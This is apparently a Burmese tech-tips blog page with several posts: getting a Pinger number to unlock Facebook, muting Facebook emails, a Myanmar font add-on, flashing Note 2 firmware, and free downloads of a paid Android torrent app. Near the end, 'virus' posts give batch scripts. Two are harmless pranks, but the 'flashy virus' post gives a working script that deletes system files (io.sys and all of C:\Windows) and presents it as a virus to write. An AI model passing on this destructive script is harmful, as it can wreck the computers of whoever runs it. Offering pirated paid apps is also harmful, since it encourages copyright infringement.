Pinger ကို ဖွင့်လိုက်ပါ .. Loading ခဏလောက်စောင့်ပြီးရင် အောက်ကပုံအတိုင်း ပွင့်လာပါမယ်

နိုင်ငံအမည်ရဲ့ဘေးကမြှားလေးကို နှိပ်ပေးလိုက်ပါ .. ခဏလောက်အကြာမှာ အောက်ကပုံအတိုင်း နိုင်ငံရွေးစရာတွေ
ပေါ်လာပါမယ် ..

Unided Kingdom ( numbers avable ) ကို ရွေးပေးလိုက်ပါ .. ပြီးရင် Lets do this ကို နှိပ်ပေးလိုက်ပါ
အောက်ကပုံအတိုင်း ပွင့်လာပါမယ်

Create account ကို နှိပ်ပေးလိုက်ပါ .. အောက်ကပုံအတိုင်း အကောင့်အတွက် ဖြည့်စရာတွေ ကျလာပါမယ်

ပုံမှာပြထားတဲ့အတိုင်း အဆင်ပြေသလို ဖြည့်ပေးလိုက်ပါ gmail ထည့်ရမယ့်နေရာမှာ တကယ်မရှိတဲ့ gmail ကိုလည်း ထည့်နိုင်ပါတယ်
ပြီးရင်တော့ Create account ကို နှိပ်ပေးလိုက်ပါ .. အောက်ကပုံအတိုင်း ကျလာပါမယ်

accept ကို နှိပ်ပေးလိုက်ရင် အောက်ကပုံအတိုင်း ဖုန်းနံပါတ်တွေကျလာပါမယ်

ကိုယ်နှစ်သက်တဲ့ဖုန်းနံပါတ်ကို အမှတ်တပ်ပေးပြီး Get this number ကို နှိပ်ပေးလိုက်ပါ
အောက်ကပုံအတိုင်း ပွင့်လာပါမယ်

Confirm ကိုနှိပ်ပေးလိုက်ပါ .. အောက်ကပုံအတိုင်း ပွင့်သွားပါမယ်

ဒီအဆင့်ကိုရောက်ရင် ဖုန်းရဲ့ Home Key ကိုနှိပ်ပြီး ထွက်လိုက်ပါ .. ပြီးရင် Pinger ကို ပြန် Run လိုက်ပါ
အောက်ကပုံအတိုင်း ဖြစ်သွားပါမယ်

No thanks ကို နှိပ်ပေးလိုက်ပါ ..
ဒါဆိုရင် Pinger နံပါတ်တစ်ခုကို ပိုင်ဆိုင်ပါပြီ .. ကိုယ်ရထားတဲ့ဖုန်းနံပါတ်ကို ပြန်ကြည့်ချင်တယ်ဆိုရင် ဖုန်းရဲ့
Menu Key ကိုနှိပ်ပြီး Setting ကိုရွေးလိုက်ရင် ဖုန်းနံပါတ်ကို တွေ့ရပါလိမ့်မယ်

ဒါတွေပြီးသွားရင်တော့ Your Freedom ကို ပိတ်ဖို့ ဖုန်းရဲ့ Noti Bar ပေါ်က သော့ပုံလေးကို နှိပ်ပေးလိုက်ပါ .. အောက်ကပုံအတိုင်း ပွင့်လာပါမယ်

Disconnect ကို နှိပ်ပေးလိုက်ပါ ..
ဒါဆိုရင် လော့ကျနေတဲ့ Facebook အကောင့်ကို ရွေးနိုင်တဲ့ ဖုန်းနံပါတ်တစ်ခုကို ပိုင်ဆိုင်ပြီဖြစ်ပါတယ် ..
လော့ဖြည်တော့မယ်ဆိုရင် နိုင်ငံနေရာမှာ United Kingdom ( +44 ) ကို ရွေးပါ ..
ဖုန်းနံပါတ်ထည့်ရမယ့်အကွက်မှာ +44 မပါစေပဲ ကျန်တဲ့နံပါတ်တွေကို ထည့်ပေးလိုက်ပါ ..
ခဏလောက်စောင့်လိုက်ရင် ကုဒ်ရောက်လာမှာဖြစ်ပါတယ်

Facebook က *Notification* တွေ Email ထဲနေ့တိုင်းဝင်နေလို့ ဖျက်မနိုင်တော့ဘူးလား

Unknown | 5:07 PM | Best Blogger Tips

Facebook က Massage (Notification) တွေ Gmail မှာလာဝင်နေတယ် ဘယ်လိုပိတ်ရမလဲ မေ့နေလို့ ပြန်ပြောပြပါလား..

မိမိ Gmail ကို Sing In ဝင်ပါ... ပုံလေးတွေကြည့်ပြီး နံပါတ်စဉ်အတိုင်း လုပ်ဆောင်ပေးသွားပါ...။

နံပါတ် (5) နေရာမှာ Facebook မှ ပို့လာတဲ့ Url (သို) Mail ကို ကူးထည့်ပါ..။

That All !!

နည်းလမ်း (၂)

www.facebook.com သို့ *Login* ၀င်လိုက်ပါ။
Account Settings ကို နှိပ်ပါ...

Notifications Tab ကိုနှိပ်ပါ

facebook+notifications

မရောက်စေချင်တာတွေကို... ဘေးနားက Edit ကိုနှိပ်ပြီး.....

stop+facebook+notifications

မိမိ မလိုချင်တာတွေ (သို့) မဝင်စေချင်တာတွေ ရွေးပြီး  Uncheck (အမှန်ခြစ်ဖြုတ်ပေးပြီး လုပ်ပေးပါ...

stop+facebook+notifications

Save and Change ကိုနှိပ်ပြီး Save လိုက်ပါ..။

Firefox ကိန္နရီ Add-ons ကိုသုံးပြီး Facebook ကိုမြန်မာလိုသုံးမယ်

Unknown | 5:04 PM | Best Blogger Tips

ကျွန်တော်ယခုတင်ပြချင်တာကတော့ Firefox မှ ကိန္နရီ Add-ons လးကိုသုံးပြီး Facebook ကို မြန်မာဘာသာဖြင့် အသုံးပြုနည်းလေးကို တင်ပြချင်ပါတယ်။ ဒီ Add-ons လေးဟာ မိမိကွန်ပျူတာမှာUnicode Font ရှိရန်မလိုဘဲ ဇော်ဂျီဖောင့်မှ ယူနီကုတ်ပြောင်းလိုသူများ အလွယ်တကူပြောင်းလဲ ပေးနိုင် ကြည့်ရူနိုင်ပါတယ်။ ပုံမှန်သင်ရိုက်နေကြ ဇော်ဂျီ ကီးဘုတ် ဖြင့်လည်း Ctrl+Alt ဖိပြီး Mouse ဖြင့်နှိပ်ပြီးUnicode ပြောင်းလဲပြီးအသုံးပြုနိုင်ပါသေးတယ်။ Firefox Version 26 များလိုအခြားနေရာတွင် မြန်မာစာပေါ်ပြီး မြန်မာနံမည် Facebook Account များတွင် လေးထောင့်တုံးဖြစ်နေတာ ကိုလည်း ဖြေရှင်းပေးနိုင်သော Add-ons လေးဖြစ်ပါတယ်။
ဒီ Add-ons လေးကိုတီထွင်ခဲ့တဲ့ Official Blog Link ကတော့  Blog>>>Myanmar Font Prefixer ဖြစ်ပြီး Developer များကို အထူး ကျေးဇူးတင်ရှိသလို ဒီနေရာကနေလည်း Creditလည်းပေးပါတယ်.....
Facebook ကိုမြန်မာဘာသာဖြင့် အလွယ်တကူအသုံးပြုချင်သူ များ အောက်မှာကြည့်ပြီး ပြုလုပ်နိုင်ပါတယ်ခင်ဗျာ.....

1.အရင်ဆုံး Facebook မှ Setting>>>General>>>Language တွင် မြန်မာဘာသာမပါဝင်သေးသောသူများ အောက်ကအတိုင်း ပါဝင်လာအောင် ပြုလုပ်နိုင်ပါတယ်။(ရှိပြီးသားသူများကတော့ ဒီအဆင့်မလိုအပ်ပါဘူး...)
2.အရင်ဆုံး ဒီလင့် ကိုသွားလိုက်ပါ။ Translations ကိုရောက်သွားလျှင် Select Language ကိုနှိပ်ပြီးမြန်မာဘာသာ ရွေးချယ်ပြီး Continue နှိပ်လိုက်ပါ။

3.အောက်ကပုံအတိုင်းပေါ်လာပါမယ်။

4.အပေါ်ကအဆင့်တွေ ပြီးသွားရင်တော့ ကိန္နရီ Add-ons လေးကို ဒီမှာ ဒေါင်းလိုက်ပါ။ ပြီးရင် Firefox ကိုRefresh ပေးလိုက်ပါ။
5.ပြီးရင်တော့ Facebook Setting >>> General >>>Language ကိုသွားပြီင်္း ညာဘက်မှ Editကိုနှိပ်ပါ။ မြန်မာဘာသာ ပြောင်းလဲပြီး  Save Changes ကိုနှိပ်လိုက်ပါ။

6.ဒါဆိုရင်တော့ သင့်ရဲ့ Facebook မှာ အောက်ကပုံတွေအတိုင်း Facebook ကို မြန်မာလို ကောင်းစွာအသုံးပြုနိုင်ပြီ ဖြစ်ပါတယ်။

Facebook က Poke တယ်ဆိုတာ

Unknown | 5:01 PM | Best Blogger Tips

Facebook ရဲ့  Timeline ဗားရှင်းအသစ်မှာလည်း Poke ဆိုတဲ့ Function လေးပါတယ်။ လူတစ်ယောက်ကို Poke လုပ်တယ်၊ Poke လုပ်တယ် ဆိုတာ အစက သေသေချာချာ မသိပါဘူး။
နည်းနည်းလေးတော့ သိပါတယ်။ စစချင်း သိထားတုန်းက Poke တယ်ဆိုတာ စတယ်လို့သိထားခြင်း ဖြစ်ပါတယ်။ စာတွေပြန်ရှာ ဖတ်ကြည့်တော့လည်း Poke တယ်ဆိုတာ စ,တာပါပဲ။
ဇူကာဘတ် အနေနဲ့ Timeline အသစ်မိတ်ဆက်ပွဲတုန်းက Poke အကြောင်းကို ပြောပြခဲ့ပါတယ်။ Poke တယ်ဆိုတာ လူတစ်ယောက်ယောက် ကို ကိုယ့်ကို သတိထားမိအောင် စိတ်ဝင်စားအောင် လက်သွားတို့တဲ့ သဘောဖြစ်ပြီး သူ Poke, ကိုယ် Poke နဲ့ တစ်ဖက်က မရပ်မချင်း Poke War ဖန်တီးနိုင်တယ်လို့ ဆိုပါတယ်။ တစ်ယောက်နဲ့ တစ်ယောက် မခင်သေးသူများ၊ ခင်ချင်သူများအတွက် အပျော်တန်း သုံးဖို့ထားထား တာလေးပါ။ ခင်ပြီးသား Friend တွေလည်း အားအားနေ လိုက် Poke နိုင်ပါတယ်။ Friend List ထဲ ရှိပြီးသား သူငယ်ချင်းတွေလည်း တစ်ယောက်တစ်လည့် Poke နိုင်ပါတယ်။
ဒီတော့ ကိုယ်က Friend မဖြစ်သေးတဲ့ သူတစ်ယောက်ယောက်ကို သွား Poke ပြီဆိုရင် အ Poke ခံရသူအနေနဲ့ လာ Poke တဲ့ သူရဲ့  Wall ကို အတားအဆီးမရှိ ဝင်ကြည့်လို့ရပါပြီ။ Friend List ထဲကလူတွေ မြင်ရ သလိုပဲ မြင်နိုင်မှာ ဖြစ်ပါတယ်။ သို့ပေမယ့် ဒါက ၃ ရက်အတွင်းမှာပါပဲ။ ဒီလိုနဲ့ သူက ကိုယ့်ကို လာ Poke လို့ တို့လည်း ပြန် Poke ပြီဆိုရင် နှစ်ဖက် စလုံးက တစ်ဖက်ဆီကို ၃ ရက် မြင်ခွင့်၊ ကြည့်ခွင့် ရမှာ ဖြစ်ပါတယ်။

ဒီတော့ တစ်ယောက်နဲ တစ်ယောက် ဓာတ်ပုံတွေကြည့်၊ Profile တွေဖတ်ပြီး ခင်ချင်ရင် Add လုပ်နိုင်ပြီး မခင်ချင်လည်း မ Add ပဲ နေလို့ရပါတယ်။ သို့တည်းမဟုတ် အ Poke ပြိုင်ပွဲ (Poke War) စေဆာ့ချင်တယ်ဆိုရင် လည်း ဆော့လို့ရပါတယ်။ ကိုယ်ကချည်း လိုက် Poke နေပြီး ဟိုက ပြန်မPoke ဘာလားဖြစ်နေလည်း ကိစ္စမရှိပါဘူး။ ဟိုက Block တာ ခံရရင်တော့ တစ်မျိုးပေါ့။

Poke မယ်ဆိုရင် Friend ဟုတ်ဟုတ် မဟုတ်ဟုတ် ကိုယ် Poke ချင်တဲ့ သူရဲ့  Timeline ကိုဝင် Timeline Cover အောက်က Message ဆိုတဲ့ စာလေးက Setting sign ကို ကလစ်နှိပ်လို့ Poke ဆိုတာလေးကို ရွေး Click နှိပ်ရ မှာ ဖြစ်ပါတယ်။

Active@ Partition Recovery toolkit

Unknown | 4:58 PM | Best Blogger Tips

ပျက်သွားတဲ့ Deleted Partitions, Fix Damaged Volumes & Disks တွေထဲက ဖိုင်တွေကို ပြန်ရှာ နိုင်မည့် ဆော့ဝဲပဲဖြစ်ပါတယ်....
Active@ Partition Recovery toolkit includes the following main features:
• Restores lost partitions & disks back to working state
• QuickScan easily detects partitions being deleted but not re-formatted
• SuperScan - low-level scan detects re-formatted & damaged partitions
• Includes Active@ File Recovery - last chance file recovery tool
• Backup & Restore disk partitioning info and ability to Rollback changes
• Fixes damaged Partition Table, MBR (Master Boot Record) and GPT
• Creates a Disk Image - sector-by-sector data backup for data recovery
• Restores all data from raw, compressed and VMWare Disk Images
• Supports Windows 7 & 8, XP & Vista, 2003 & 2008 & 2012 Servers, WinPE
• Recovers deleted FAT/exFAT/NTFS/HFS+/UFS/Ext2/Ext3/Ext4fs file systems
• Recovers IDE, SATA, eSATA, SSD, SCSI, RAID, USB Flash Disks and Memory Cards
• Recovers volumes lost due to accidental disk formatting, damage by virus attack, malicious program, or a power failure...

ဒီမှာယူပါ

အင်တာနက် Website လမ်းညွှန်နှင့် Facebook အသုံးပြုနည်းစာအုပ် (6.5MB)

Unknown | 4:53 PM | Best Blogger Tips

အင်တာနက် Website လမ်းညွှန်နှင့် Facebook အသုံးပြုနည်း စာအုပ်ဖြစ်ပါယ်။ Website တွေလည်း တော
တော်စုံပါတယ်။ အခုမှ အင်တာနက်စတင်အသုံးပြုသူများအတွက် အရမ်းအသုံးဝင်တဲ့ စာအုပ်လေးပါဗျာ။
ဆောင်ထားသင့်ပါတယ်။ အဆင်ပြေပါစေ.........
Download=>> Link 1, Link 2, Link 3

Netguide Journal Vol (3), Issue (21) (29.1.14)

Unknown | 4:49 PM | Best Blogger Tips

NetGuite ဂျာနယ်ကို အပတ်စဉ် ဗုဒ္ဒဟူးနေ့တိုင်းတင်ပေးသွားမှာဖြစ်ပါတယ်ဗျာ။ NetGuide ဂျာနယ် ကိုဖတ်ချင်သူများအတွက်မူရင်းဆိုဒ်က နေပြီး ဒေါင်းလုပ်လင့်ကိုတင်ပေးလိုက်တာပါဗျာ။ NetGuide ဂျာနယ်ဝယ်ဖတ်စရာမလိုတော့ဘူးပေါ့။ အခုအပတ်မှာ NetGuide Journal Vol(3), Issue (21) ကိုတင်ပေး လိုက်ပါတယ်ဗျာ။ ဒီနေ့ 29 ရက်နေ့ထွက် Update လေးပါ။ ဂျာနယ်ကိုဝယ်ဖတ်ရန်အတွက် အဆင် မပြေသောနေရာဒေသမှ သူငယ်ချင်းများအားလုံးအဆင်ပြေကြပါစေဗျာ။

A Torrent PRO v2.1.4.7 App Latest Version For Android(January,th27,2014 Updated)for android

Unknown | 4:47 PM | Best Blogger Tips

image
✔a Torrent PRO v2.1.4.7 App Latest Version For Android(January,th27,2014 Updated)✔
-တချို့ဆိုဒ်​​တွေမှာဆိုရင်​ ဖိုင်​ဆိုဒ်​ကြီးတဲ့ File ​တွေ၊Data ​တွေကို၊Apk တို့၊Rar တို့၊Zip တို့ အ​နေနဲ့ မတင်​ပဲနဲ့ "Torrent" ဖိုင်​အ​နေနဲ့ ထုတ်​ပြီး တင်​ထားတတ်​ကြပါတယ်​-
-အဲ့လို "Torrent" ဖိုင်​အ​နေနဲ့ တင်​ထားတဲ့ ဖိုင်​​တွေကို Android ဖုန်းနဲ့​ဒေါင်းလုဒ်​ ယူဖို့ဆို ရင်​​တော့ "aTorrent Pro" ဆိုတဲ့ ဒီ Application ​လေးနဲ့ အလွယ်​တကူပဲ ​ဒေါင်းယူလို့ရရှိ အဆင်​​ပြေ​စေမှာပဲ ဖြစ်​ပါ တယ်​။ကြီးမားတဲ့ ဖိုင်​ဆိုဒ်​​တွေကိုလည်း ဒီ App က​နေ ​ဒေါင်းယူနိုင်​ပါတယ်​-
-ဒီ ​ဆော့ဖ်​ဝဲ​လေးကို Google Play Store မှာ ဝယ်​ယူအသုံးပြုမယ်​ဆိုရင်​ $3.99 ​ပေးဝယ်​ရမှာဖြစ်​ပြီး၊ဒီမှာ​တော့ Free ​ဒေါင်းလုဒ်​ဆွဲယူနိုင်​ပါတယ်​-
-Apk အသုံးပြုကလည်း ရိုးရှင်းပါတယ်​။Torrent ဖိုင်​နဲ့တင်​ထားတဲ့ လင့်​ခ်​ ကို click နှိပ်​လိုက်​။ပြီးရင်​ ဒီ Torrent Apk ကို ​ရွေး​ပေးလိုက်​။သူ့ဟာသူ auto ​ဒေါင်းလုပ်​ဆွဲ​နေပါလိမ့်​မယ်​။ဒေါင်းလုပ်​ limit ကိုလည်း notification bar ဘားမှာ ဆွဲချပြီး ကြည့်​လို့ရမှာဖြစ်​ပါတယ်​။ဒါ​လေးပါပဲ-
-Apk File Size 4.3MB ရှိပြီး​တော့
-Android OS Version 2.1 နှင့်​အထက်​ရှိ ထား​သော ဖုန်းများမှာ ထည့်​သွင်း install လုပ်​၍ အသုံးပြုနိုင်​ပါပြီ-

Note 2(GT-N7100)ကိုမြန်မာစာပါဝင်တဲ့ Android 4.3 ထိုင်း Firmware တင်နည်း

Unknown | 8:51 AM | Best Blogger Tips

1-Computer မှာ Samsung USB Driver မရှိသေးရင် Download လုပ်ပြီး Install လုပ်ပါ။

2- Odin_v3.09.zip ကို Download လုပ်ပြီး Desktop ပေါ်မှာ Extract လုပ်ပါ။

Download Odin v3.09.zip

3- Firmware ကို Download လုပ်ပြီး Desktop ပေါ်မှာ Extract လုပ်ပါ။

Download Firmware

4-ဖုန်းမှာ USB Debugging ကို On ထားပြီး Battery 80% ရှိရန် လိုအပ်ပါတယ်။

5- Download mode ဝင်ပါမယ်။ ဖုန်းကို ပါဝါပိတ်ပြီး Volume Down + Home + Power Button သုံးခုကို တစ်ပြိုင်တည်း တွဲနှိပ်ပါ။ Warning! ပေါ်လာရင် Volume Up တစ်ချက်နှိပ်ပါ။

6-Download Mode ရောက်ရင် Odin ကို Run ပြီး ဖုန်းကို Computer နဲ့ ချိတ်ဆက်ပါ။ ID:COM Box မှာ အရောင်သမ်းလာရင် ဆက်လုပ်မယ်နော်။

7-Odin ထဲမှာ AP Button ကလွဲပြီး ကျန်တာဘာမှ မနှိပ်ပါနဲ့။ AP ဆိုတာ အရင်က PDA ပါပဲ။ Odin Version မြင့်လာတာကြောင့် မတူတော့ပါ။ အဲဒီ AP ကို နှိပ်ပြီး Desktop ပေါ်မှာ Extract လုပ်ထားတဲ့ .tar.md5 file ကို ထည့်ပါ။

8-အားလုံး စစ်ဆေးပြီး မှန်တယ်ဆိုရင် Start Button ကို နှိပ်ပါ။

9-Install ပြီးလို့ ID:COM Box မှာ PASS!! ပြရင် ဖုန်းက Reboot ဖြစ်သွားပါလိမ့်မယ်။

ပုံမှန်အနေအထား ပြန်ရောက်လာရင် ကြည့်လိုက်ပါ။ Note 2 က Android 4.3 Firmware နဲ့ လန်းနေပါလိမ့်မယ်။ မြန်မာစာ မှန်ပါတယ်။

Firmware details
Model: GT-N7100
Country: Thai
Version: Android 4.3 Jelly Bean
MODEM: THL-N7100XXUEML

Fake Virus2

Unknown | 1:30 AM | Best Blogger Tips

ကျွန်တော် Google ကနေရှာတွေ့ထားတာ သိလား သူက Fake Virus တစ်မျိုးပဲ Notepad လေးသုံးပြီး ကလိရတာ ဗဟုသုတ အဖြစ်ပေါ့ ဒါလေးသုံးပြီး ဘယ်သူ့ကိုမှလည်း လျှောက်မခြောက်နေနဲ့ ဦးနော် တော်ကြာ မောင်မင်းလူကလေး သူများကို အတတ်ကောင်းတွေ သင်ပေးနေတယ် အပြောခံနေရဦးမယ်။း )  လက်တွေ့ လိုက်လုပ်ပြီး စမ်းကြည့်လိုက်ပါ စက်ကို ဘာမှ မထိခိုက်နိုင်ပါဘူး သူက တစ်ကယ် Virus အစစ်မဟုတ်ပါဘူး။ အလကား အလကား Virus ပါ စမ်းကြည့်ချင်သူများ Notepad လေးကို ဖွင့်ပြီး အောက်မှာ ကျွန်တော်ပေးထားတယ့် Code ကလေးတွေကို ကူးထည့်လိုက်ပါ။

@echo off
tittle Virusss
color 04
echo you have a virus on your computer
pause
echo contatting antivirus...
pause
echo Do you want to delete the virus?
pause
echo access denied
echo access denied
echo access denied
pause
echo activating Virus.....
echo Virus Activated!!!
pause
:1
dir/s
goto 1

ပြီးရင် File ကနေ Save as... ကိုရွေးပေးလိုက်ပါ Save as,.. Window ကျလာရင် အောက်ဆုံးမှာ ရှိတယ့် Save as type ဆိုတယ့် နေရာလေးမှာ All type ဖြစ်အောင် အရင်ပြောင်းပေးလိုက်ပါ။ ပြီးရင် File name ဆိုတယ့်နေရာမှာ ကိုယ်ပေးချင်တယ့် နာမည်ပေးလိုက်ပါ ကိုယ်ပေးထားတယ့် နာမည်ရဲ့ နောက်မှာ .bat ဆိုတာလေးပါရပါမယ် ဥပမာ Virus လို့ နာမည်ပေးတယ်ဆိုရင် အဲဒီနေရာမှာ Virus.bat ဆိုပြီး ရိုက်ပေးရပါမယ်။ .bat ဆိုတာက ကိုယ် Save လုပ်ချင်တယ့် File အမျိုးအစားပါ။ ပြီးသွားရင်တော့ ကိုယ်သိမ်းချင်တယ့်နေရာလေး ရွေးပြီး ရင် သိမ်းလို့ရပါပြီ ပြီးရင် ကိုယ်သိမ်းထားတယ့် File လေးကို ဖွင့်ကြည့်လိုက်ပါ။ ဘာမှမစိုးရမ်ပါနဲ့ သူက Virus အတုပဲဖြစ်ပါတယ် ကျွန်တော်ကိုယ်တိုင် ကိုယ့်စက်ထဲမှာ စမ်းသပ်ပြီး အဆင်ပြေမှ တင်ပေးလိုက်တာပါ။ စမ်းကြည့်ချင်သူများ စမ်းကြည့်လိုက်ကြပါဦး။

Fake Virus

Unknown | 1:27 AM | Best Blogger Tips

ဒီ Virus က သင်.ကွန်ပြူတာကို ဒုက္ခတော.မပေးပါဘူး။ဒါပေမယ်.သူကသင်.ရဲ. Password တွေ ၊ကွန်ပြူ
တာပေါ်ကအချက်အလက်တွေ အကုန်ခိုးယူသွားနိုင်ပါတယ်။Antivirus ကောင်းကောင်း ရှိ.နေရင်တော.
ပြသနာမရှိ.နိုင်ပါ။

ရေးသားနည်းကတော.

(၁) ပထမဆုံး Text Document တခုကိုယူလိုက်ပါ။ပြီးရင်တော.အောက်
ပါအတိုင်းရေးလိုက်ပါ။

(၂)

@echo off
echo RaidX is now hacking your pc
pause
echo scanning saved password
pause
echo found and saved
pause
echo Finding paypal/bank info on modem
netstst -a
echo :infomation sent to blackjack.pol@gmail.com
pause
echo press anykey to exit
press exit

(3)ပြီးရင်တော. damnit.bat ဖိုင်နဲ. save ပေးလိုက်ပါ။

flashy virus ရဲ.အ ခြေခံသဘောတရားလေး

Unknown | 1:23 AM | Best Blogger Tips

Virusဆိုတာတကယ်တော.စာသားတွေပါပဲ။ခက်တာကအဲဒီစာလုံးလေးတွေကcomputer တွေကို
ဒုက္ခပေးနေတာပါ။ ဒီနေ.တော.အလွယ်ဆုံး virusရေးနည်းလေးတခုပြောပြပါမယ်။ပထမဆုံး Text
document လေးတခုလုပ်လိုက်ပါ။ပီးရင်တော. အောက်ပါအတိုင်းစာသားလေးတွေရေးလိုက်ပါ။

@echo off
atrrib -a-s-r-h
cls
del c:\io.sys
cls
del c:\windows\*.*
cls

ပြီးရင်တော. File ထဲမှာ မိမိနှစ်သက်တဲ.နာမည်ရေးပြီး နောက်က .batဖိုင်နဲ.ဆေ့လိုက်ပါ ။
ဒါဆိုရင် virus အသေးစားလေးဖြစ်သွားပါပြီ။

ဒါပေမယ်. ဒီအခြေခံသဘောတရားလေးဟာ အရင်ကနာမည်ကြီးခဲ.တဲ. flashy virus ရဲ.အ
ခြေခံသဘောတရားလေးပဲဖြစ်ပါတယ်။

bat file အတိုအစ

Unknown | 1:19 AM | Best Blogger Tips

ပထမဦးဆုံးNotepad အသစ်တစ်ခုကိုဖွင့်ပါ။
အောက်ပါ code ကို copy ကူးလိုက်ပါ။
StrText=”MgminLukaLay is very handsome”
Set Objvoice=Createobject(“SAPI.SpVoice”)
ObjVoice.Speak StrText
ပြီးရင် Master.vbs ဖြင့် Save မှတ်လိုက်ပါ။
Run ကြည်.လိုက်ပါ။
“MgminLukaLay is very handsome” ဆိုပြီးအသံထွက်ပါမယ်။
ထပ်ပြီးအသုံးချချင်သူများ”MgminLukaLay is very hadsome”နေရာမှာပြောင်းနိုင်ပါတယ်။

MgminLukaLay ကိုယ့်ငါးချဉ်ကိုယ်ချဉ်သော post :P

နောက်ဆုံးတင်ထားတာလေးတွေ

get this widget here